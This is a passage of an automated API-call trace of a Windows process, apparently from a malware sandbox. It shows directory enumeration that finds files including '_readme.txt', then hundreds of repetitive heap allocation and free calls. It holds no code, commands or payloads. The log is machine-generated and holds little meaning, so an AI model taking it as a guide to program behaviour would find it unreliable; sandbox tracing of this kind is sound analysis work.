lpFindFileData=0x9dbfba4 | out: lpFindFileData=0x9dbfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xc8a8ea10, ftLastAccessTime.dwHighDateTime=0x1d62438, ftLastWriteTime.dwLowDateTime=0xc8a8ea10, ftLastWriteTime.dwHighDateTime=0x1d62438, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3275b30 [0142.702] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac21a8 | out: hHeap=0x620000) returned 1 [0142.702] FindNextFileW (in: hFindFile=0x3275b30, lpFindFileData=0x9dbfba4 | out: lpFindFileData=0x9dbfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xc8a8ea10, ftLastAccessTime.dwHighDateTime=0x1d62438, ftLastWriteTime.dwLowDateTime=0xc8a8ea10, ftLastWriteTime.dwHighDateTime=0x1d62438, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0142.702] FindNextFileW (in: hFindFile=0x3275b30, lpFindFileData=0x9dbfba4 | out: lpFindFileData=0x9dbfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe8132526, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16640, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0142.702] FindNextFileW (in: hFindFile=0x3275b30, lpFindFileData=0x9dbfba4 | out: lpFindFileData=0x9dbfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc8a8ea10, ftCreationTime.dwHighDateTime=0x1d62438, ftLastAccessTime.dwLowDateTime=0xc8a8ea10, ftLastAccessTime.dwHighDateTime=0x1d62438, ftLastWriteTime.dwLowDateTime=0xc8a8ea10, ftLastWriteTime.dwHighDateTime=0x1d62438, nFileSizeHigh=0x0, nFileSizeLow=0x45b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 1 [0142.702] FindNextFileW (in: hFindFile=0x3275b30, lpFindFileData=0x9dbfba4 | out: lpFindFileData=0x9dbfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc8a8ea10, ftCreationTime.dwHighDateTime=0x1d62438, ftLastAccessTime.dwLowDateTime=0xc8a8ea10, ftLastAccessTime.dwHighDateTime=0x1d62438, ftLastWriteTime.dwLowDateTime=0xc8a8ea10, ftLastWriteTime.dwHighDateTime=0x1d62438, nFileSizeHigh=0x0, nFileSizeLow=0x45b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 0 [0142.702] FindClose (in: hFindFile=0x3275b30 | out: hFindFile=0x3275b30) returned 1 [0142.702] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.702] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1730 | out: hHeap=0x620000) returned 1 [0142.702] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1730 [0142.702] PeekMessageW (in: lpMsg=0x9dbfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9dbfb74) returned 0 [0142.702] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac21a8 [0142.702] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aafb40 [0142.702] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.702] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac21a8 | out: hHeap=0x620000) returned 1 [0142.702] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac21a8 [0142.702] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aafb40 [0142.702] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.702] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac21a8 | out: hHeap=0x620000) returned 1 [0142.702] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac21a8 [0142.702] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aafb40 [0142.702] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.702] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac21a8 | out: hHeap=0x620000) returned 1 [0142.702] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac21a8 [0142.702] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aafb40 [0142.702] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.703] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac21a8 | out: hHeap=0x620000) returned 1 [0142.703] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac21a8 [0142.703] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aafb40 [0142.703] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.703] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac21a8 | out: hHeap=0x620000) returned 1 [0142.703] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac21a8 [0142.703] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x9aafb40 [0142.703] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.703] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac21a8 | out: hHeap=0x620000) returned 1 [0142.703] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac21a8 [0142.703] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aafb40 [0142.703] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc2e) returned 0x325d510 [0142.703] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.703] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x325d510 | out: hHeap=0x620000) returned 1 [0142.703] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac21a8 | out: hHeap=0x620000) returned 1 [0142.703] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac21a8 [0142.703] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aafb40 [0142.703] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.703] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac21a8 | out: hHeap=0x620000) returned 1 [0142.703] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac21a8 [0142.703] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x9aafb40 [0142.703] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.703] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac21a8 | out: hHeap=0x620000) returned 1 [0142.703] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac21a8 [0142.703] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3221ae8 [0142.703] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3221ae8 | out: hHeap=0x620000) returned 1 [0142.703] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac21a8 | out: hHeap=0x620000) returned 1 [0142.703] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac21a8 [0142.703] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3221ae8 [0142.703] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3221ae8 | out: hHeap=0x620000) returned 1 [0142.703] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac21a8 | out: hHeap=0x620000) returned 1 [0142.703] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac21a8 [0142.703] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aafb40 [0142.703] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.703] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac21a8 | out: hHeap=0x620000) returned 1 [0142.703] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac21a8 [0142.703] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aafb40 [0142.703] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.703] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac21a8 | out: hHeap=0x620000) returned 1 [0142.704] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac21a8 [0142.704] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x9aafb40 [0142.704] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.704] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac21a8 | out: hHeap=0x620000) returned 1 [0142.704] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac21a8 [0142.704] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x9aafb40 [0142.704] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.704] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac21a8 | out: hHeap=0x620000) returned 1 [0142.704] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac21a8 [0142.704] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aafb40 [0142.704] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.704] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac21a8 | out: hHeap=0x620000) returned 1 [0142.704] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac21a8 [0142.704] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aafb40 [0142.704] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.704] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac21a8 | out: hHeap=0x620000) returned 1 [0142.704] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac21a8 [0142.704] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aafb40 [0142.704] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.704] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac21a8 | out: hHeap=0x620000) returned 1 [0142.704] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac21a8 [0142.704] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aafb40 [0142.704] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.704] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac21a8 | out: hHeap=0x620000) returned 1 [0142.704] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac21a8 [0142.704] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aafb40 [0142.704] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.704] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac21a8 | out: hHeap=0x620000) returned 1 [0142.704] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac21a8 [0142.704] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aafb40 [0142.704] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.704] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac21a8 | out: hHeap=0x620000) returned 1 [0142.704] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac21a8 [0142.704] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aafb40 [0142.704] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.704] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac21a8 | out: hHeap=0x620000) returned 1 [0142.704] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac21a8 [0142.704] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aafb40 [0142.705] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x325d510 [0142.705] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.705] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x325d510 | out: hHeap=0x620000) returned 1 [0142.705] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac21a8 | out: hHeap=0x620000) returned 1 [0142.705] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac21a8 [0142.705] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aafb40 [0142.705] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.705] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac21a8 | out: hHeap=0x620000) returned 1 [0142.705] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac21a8 [0142.705] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aafb40 [0142.705] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc2e) returned 0x325d510 [0142.705] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.705] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x325d510 | out: hHeap=0x620000) returned 1 [0142.705] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac21a8 | out: hHeap=0x620000) returned 1 [0142.705] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac21a8 [0142.705] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3221ae8 [0142.705] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3221ae8 | out: hHeap=0x620000) returned 1 [0142.705] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac21a8 | out: hHeap=0x620000) returned 1 [0142.705] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac21a8 [0142.705] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3221ae8 [0142.705] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3221ae8 | out: hHeap=0x620000) returned 1 [0142.705] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac21a8 | out: hHeap=0x620000) returned 1 [0142.705] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac21a8 [0142.705] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aafb40 [0142.705] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.705] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac21a8 | out: hHeap=0x620000) returned 1 [0142.705] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac21a8 [0142.705] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aafb40 [0142.705] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.705] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac21a8 | out: hHeap=0x620000) returned 1 [0142.705] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac21a8 [0142.705] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aafb40 [0142.705] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x325d510 [0142.705] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.705] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x325d510 | out: hHeap=0x620000) returned 1 [0142.705] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac21a8 | out: hHeap=0x620000) returned 1 [0142.705] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac21a8 [0142.705] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x9aafb40 [0142.706] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.706] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac21a8 | out: hHeap=0x620000) returned 1 [0142.706] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac21a8 [0142.706] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x9aafb40 [0142.706] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.706] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac21a8 | out: hHeap=0x620000) returned 1 [0142.706] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac21a8 [0142.706] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aafb40 [0142.706] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.706] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac21a8 | out: hHeap=0x620000) returned 1 [0142.706] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac21a8 [0142.706] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aafb40 [0142.706] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.706] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac21a8 | out: hHeap=0x620000) returned 1 [0142.706] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac21a8 [0142.706] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aafb40 [0142.706] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.706] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac21a8 | out: hHeap=0x620000) returned 1 [0142.706] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac21a8 [0142.706] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aafb40 [0142.706] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.706] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac21a8 | out: hHeap=0x620000) returned 1 [0142.706] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac21a8 [0142.706] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aafb40 [0142.706] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.706] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac21a8 | out: hHeap=0x620000) returned 1 [0142.706] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac21a8 [0142.706] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aafb40 [0142.706] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.706] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac21a8 | out: hHeap=0x620000) returned 1 [0142.706] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac21a8 [0142.706] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aafb40 [0142.706] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.706] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac21a8 | out: hHeap=0x620000) returned 1 [0142.706] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac21a8 [0142.706] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aafb40 [0142.706] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x325d510 [0142.706] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.706] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x325d510 | out: hHeap=0x620000) returned 1 [0142.707] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac21a8 | out: hHeap=0x620000) returned 1 [0142.707] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac21a8 [0142.707] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aafb40 [0142.707] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.707] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac21a8 | out: hHeap=0x620000) returned 1 [0142.707] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac21a8 [0142.707] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3221ae8 [0142.707] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3221ae8 | out: hHeap=0x620000) returned 1 [0142.707] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac21a8 | out: hHeap=0x620000) returned 1 [0142.707] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac21a8 [0142.707] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3221ae8 [0142.707] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3221ae8 | out: hHeap=0x620000) returned 1 [0142.707] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac21a8 | out: hHeap=0x620000) returned 1 [0142.707] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac21a8 [0142.707] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aafb40 [0142.707] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.707] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac21a8 | out: hHeap=0x620000) returned 1 [0142.707] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac21a8 [0142.707] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aafb40 [0142.707] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.707] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac21a8 | out: hHeap=0x620000) returned 1 [0142.707] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac21a8 [0142.707] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aafb40 [0142.707] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x325d510 [0142.707] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.707] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x325d510 | out: hHeap=0x620000) returned 1 [0142.707] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac21a8 | out: hHeap=0x620000) returned 1 [0142.707] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac21a8 [0142.707] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x9aafb40 [0142.707] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.707] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac21a8 | out: hHeap=0x620000) returned 1 [0142.707] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac21a8 [0142.707] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x9aafb40 [0142.707] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.707] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac21a8 | out: hHeap=0x620000) returned 1 [0142.707] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac21a8 [0142.707] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aafb40 [0142.707] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.707] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac21a8 | out: hHeap=0x620000) returned 1 [0142.708] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac21a8 [0142.708] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aafb40 [0142.708] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.708] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac21a8 | out: hHeap=0x620000) returned 1 [0142.708] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac21a8 [0142.708] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aafb40 [0142.708] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.708] HeapFree (in: hHeap=0x620000, 